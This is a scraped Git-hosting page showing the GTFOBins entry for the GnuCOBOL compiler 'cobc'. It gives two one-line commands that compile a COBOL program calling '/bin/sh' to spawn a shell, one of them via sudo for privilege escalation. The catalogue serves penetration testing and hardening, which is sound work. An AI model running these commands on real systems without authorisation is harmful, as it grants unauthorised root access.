This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
127738e9276a8a434bd46a8bde67b01e0fa27d62
GTFOBins.github.io
/
_gtfobins
/
cobc.md
bcoles
b94b01477c
Create cobc.md
2020-03-14 11:53:05 +01:00
319 B
Raw
Blame
History
functions
functions
shell
sudo
code
TF=$(mktemp -d) echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x cobc -xFj --frelax-syntax-checks $TF/x
code
TF=$(mktemp -d) echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x sudo cobc -xFj --frelax-syntax-checks $TF/x
Reference in New Issue
View Git Blame
Copy Permalink